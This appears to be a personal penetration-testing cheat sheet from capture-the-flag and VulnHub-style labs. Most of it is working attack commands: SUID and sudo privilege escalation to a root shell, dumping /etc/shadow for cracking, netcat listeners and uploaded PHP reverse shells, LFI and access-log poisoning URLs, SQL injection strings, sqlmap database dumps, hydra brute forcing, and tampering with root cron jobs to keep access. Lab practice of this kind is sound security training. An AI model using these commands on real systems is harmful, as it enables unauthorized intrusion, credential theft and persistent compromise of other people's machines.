Begun 16 March, 2021 - Hack checklist: - Search for SUID bits set on binaries you can execute as root for priv escalation - Search for id_rsa, private certs with which you can escalate privileges. - Scan robots, dirb directories, html/php source code for usernames or passwords or base64 strings you can decode - Add some of these to a script you can paste into a system to find recursively for such SUID files and certs or other. - Be alert for potential usernames anywhere, base64 encoded strings, robots, html/php/other code strings. Usernames! - Try ssh-ing/ftp-ing into boxes with found usernames and potential passwords or hydra the services for brute force access./ - You can ssh back into a box with private keys (id_rsa), root at best. - uname -a to see if the local system is vulnerable. Download exploit, compile and execute for local uid0 - searchsploit [keyword] to find vulns or search CVEs or exploithub or wherever. Use against local or remote - nc -lvp 4444 to setup nc listener for the target to connect back to you on as with a python reverse shell. - Check /tmp for fishiness. Stuff gets placed there by attackers b/c it's world writeable. - If you're ssh-ed in, paste linenum.sh into the box and run it to gather local intel. Great tool./ - Check /etc/crontab to see what processes are running out of the ordinary. Can contain passwords in scripts set to run. - Swap out (If possible) scripts which run as root from crontab with your own like add you to gid0 or create a new account with creds you set. - You can call into a server with bad php: http://192.168.175.72:8593/?book=../../../../../var/log/apache2/access.log or error.log - Entries in /etc/crontab can be hidden from view depending on crlf or end of line entry. Reveal by pasting into vi or other editor - Check gobuster.out for interesting hidden directories or filenames. like /secret or whatever - Always try default credentials like admin/admin, root/toor etc. Or google search for default creds for the software you're seeing. - Try SQL vuln elicit with: ' or 1=1; -- or http://192.168.120.224/store/book.php?bookisbn=%27%20or%201=1;%20-- - .php files let you add strings onto the end of URLs for command injection or like cat /etc/shadow and if web service is running as root, it works. - Try sqlmap -u http://1.2.3.4/secret.php?number= --dump-all --batch -D store (Store being the database) - Connect with mysql or do password guessing with hydra or medusa - show databases; show tables; show * where X is that.... Find pass database for hashes to crack with john or crackstation - LFI - Local File Include is where we somehow upload files then call them and they get executed with privs of the web service account like apache. - Like, $cp /usr/share/webshells/php/php-reverse-shell.php. Edit with your ip/open port and run the reverse php shell and it connects back to you. - If you try to get the robots.txt file and it says no b/c you're not a search engine, curl supports delcaring your browser strings to be a permitted search engine. - Find / |grep pass to search the entire system for password files or smiliar. Pivot! - Don't forget to pivot to other boxes on the remote network, if it exists. - In metasploit, searchsploit to find exploit, then $cp /usr/share/exploitdb/platform/windows/remote/3996.c /root/3996.c. Compile and run. - $sudo -l to enumerate what the user is able to on a ssh term. sudo -l lists paths with potential suid bits set to run with root privs. - /usr/bin/time /bin/sh for priv escalation. Maybe script a bunch of those to execute to attempt priv escalation - Using a SUID binary, try: $LFILE=/etc/shadow $sudo /usr/bin/SUID-BINARY --raw -F "$LFILE" $Failed to resolve host yet still dumps /etc/shadow for cracking - dirb http://192.168.0.27 -X .zip (Find files with this eXtension) - LFI with http://192.168.120.170/console/file.php?file=/etc/passwd or shadow - Dirb can reveal useful php or directories for these LFI attempts. - View for poisoning auth.log: 192.168.1.129/lfi/lfi.php?file=/var/log/auth.log - ssh ''@192.168.120.170 [See how that tacks some command injection string into the ssh command - Navigating to manipulated URLs can cause the web server to execute files you uploaded in the LFI and reconnect back to you for remote shell. - Check your privileges, whatever they are. If you can compromise a seemingly unpriv-ed account, you may have access to things like services or ? - $sudo -l (List privs) Responds with "you may run the following commands - If your shell seems constricted by chroot or you have no path statements, you can /usr/bin/ls (absolutes) or make path statements - Escalation: You can pipe scripts into binaries includig nmap involving /bin/sh $TF=$(mktemp) - for example echo 'os.execute("/bin/sh")' >$TF sudo -u root nmap --script=$TF This executes the shell as the root privs you got from nmap. - If you're in a restricted shell, try $bash --noprofile. Seems to clear that up. Misc Linux Hacknotes: - /etc/passwd can actually contain hashes. Crack when found - gobuster or dirb to brute force hidden directories or objects. Good for finding web objects for uploading files for remote code execution - wordlists on kali are stored in /usr/share/wordlists/ - start netcat listener with #nc -nvlp [port], usage #nc -nvlp 4444 - Kali stores webshells here /usr/share/webshells. Notably, like php-reverse-shell.php. Edit for usage top 10 lines - When guesing passwords, try the username as a pass, or use cewl to augment wordlists for hydra brute forcing - Use apt list --installed to see what's installed in debian - Use the stat command to view extended file info - you can hide /etc/crontab services with a eol/crlf character. View hidden ones with $hexeditor - use dpkg --list to view installed apps - tail -f /var/log/syslog shows repeated errors with the expressvpn.service daemon - /etc/systemd/system/expressvpn.service - #systemctl stop expressvpn.service seems to have killed it - #systemctl disable expressvpn.service - Response: Removed /etc/systemd/system/multi-user.target.wants/expressvpn.service - Errors in /var/log/syslog for expressvpn ended - systemctl status expressvpn.service - Imagine a captcha is stopping you from logging in, view source, find captcha.php and sometimes the value is in the source code. Duh. - git clone http://github.com/openwall/john would copy JTR to your local machine. - From there, cd into john/src, ./configure, make, make install - Didn't seem to run right but that's how you do that. Didn't put anything into my path to execute though. - zip2john is a password cracker for zip files. Don't have to brute force those. - In /etc/passwd a default shell of /bin/rbash means restricted bash. - You'd have to escape that but you can run software outside your path so that will be easy. - Try ssh username@1.2.3.4 -t "bash --noprofile" and try using full paths to binaries like /usr/bin/cat or whatever (Worked) - Get attackable VMs from :https://www.vulnhub.com/ - You can 'strings' binaries looking for ASCII characters to gether intel about the file - $ls -al /tmp to see what's going on in there. Got a base64 string from a tmp file I opened - #chkrootkit to check for rootkit activity or evidence - responder.py listens on the local network for LLMNR - Local Link Multicast Name Resolution broadcasts and gathers up hashes for local cracking and reuse - - Search for vulns in metasploit. Example msf >use auxiliary/admin/http/wp_google_maps_sqli - Check for ability to upload and execute files via url like http://1.2.3.3/upload_dir/exploit.php - If TCP/3306 is open, it's MySQL. You can connect with #mysql -u root -p -h 1.2.3.3 and dig for usernames/passes. - Base64 encoding: if you see a string of text like this 'Sld6WHVCSkpOeQ==', it may be base64 encoded - echo 'Sld6WHVCSkpOeQ==' |base64 -d (or --decode) - Sometimes passwords are hidden in plain sight. - Other times, a pass hash looks like $P$BsqOdiLTcye6AS1ofreys4GzRlRvSr1 - Save to hashfile.txt and $john hashfile.txt to crack it. - If you find passes anywhere, try logging in anywhere with them to escalate privileges. - In a ls command, check file ownership for usernames or /etc/password or /home/username - Make copies of files while you have root shell and chmod 666 them so you don't lose access. - LFI - Local File Include: - http://192.168.120.45/?page=php://filter/convert.base64-encode/resource=config - This says "hey server, open this file I have. More on offensive-security.com. Study./ - Practice on DVWA. - Check all web content to which you have access. One VM had admin credentials in cleartext. - If you're restricted to uploading file types like only .jpg or .png, simply rename a .php to .jpg to upload and execute for reverse shell. - Search metasploit for specific version numbers of software to attack. Searchsploit - Once disovered: msf > nmap -Pn -sS -A oX target_db 1.2.3.0/24 or 1.2.3.4 msf > db_import target_db msf > hosts (to view hosts in the target_db) msf > db_nmap -sSV -A 1.2.3.4 (Targets from target_db) - If you find a place to upload files, upload php reverse shells, then call them via URL: - First, start reverse shell with netcat with #nc -lvp 4444 (Any IP on 4444) - Some VMs have file upload ability, then call via web browser - http://192.168.120.30/uploaded_files/php-reverse-shell.php​ (Calls the script you uploaded) - Webshells are stored in /usr/share/webshells - Notably php-reverse-shell.php - Once you run the shell on the webserver, it connects back, then escalate privs. - find / |grep txt or root or flag or whatever file anywhere on the filesystem - Navigating to http://192.168.120.30/flag/ can grant a flag. msf > search CVE:2008:9798 - Shows you the exploit. Select with the number next to it like msf > use 0 - Regex to find valid IP Address: ((2[0-5]{2})|(1*[0-9]{1,2}))(\.(2[0-5]{2})|\.(2[0-4]\d)|\.(1*[0-9]{1,2})){3} - amap can find services running on non-standard ports. E.g., when ssh is running on tcp/655335 - More on Kali MiniBox puter - Format nikto output for msf import and use #nikto -h 1.2.3.4 -Format msf+ - Binaries with S bit set with #chmod +s /bin/bash are executed with root privs so that (!) $bash -p results in uid0 (root) - nmap -p- -T4 --top-ports=5000 1.2.3.4 (Scan top 5000 ports) - $ openssl passwd -1 -salt hack pass123 $1$hack$22.CgYt2uMolqeatCk9ih/ - zip2john is hugely faster than fcrackzip, massively. - sqlmap.py -u "http://www.site.com/section.php?id=51" ==Test to see if vuln to injection - sqlmap -u http://192.168.75.72/index.php - Searchsploit searches exploit-db for sploits from a cmdline. Isn't related to msf> - echo "GET HTTP/1.1" | nc 192.168.189.72 80 - Dumps - Poison the webserver logs with script, then call the access.log with curl! wow! - $echo "GET HTTP/1.1" | nc 192.168.175.72 80 - First, start our listener with #nc -nvlp 444 - Then trigger it with the LFI. - $curl http://192.168.175.72:8593?book=../../../../../var/log/apache2/access.log - We receive our shell. - If you have shell on a box, check permissions on web files to see if you have write access to like index.php. Change it to escalate privs. - If you can't find the flag, do a #search / |grep \.txt and sort by date to find a recently-edited text file flag. dafe5f0c961a70c32fd1721cb99c7771 - If a site you're working calls out to a non-existant domain, you can put an entry back to you on /etc/hosts so the site works. Worked on Proving Grounds Loly -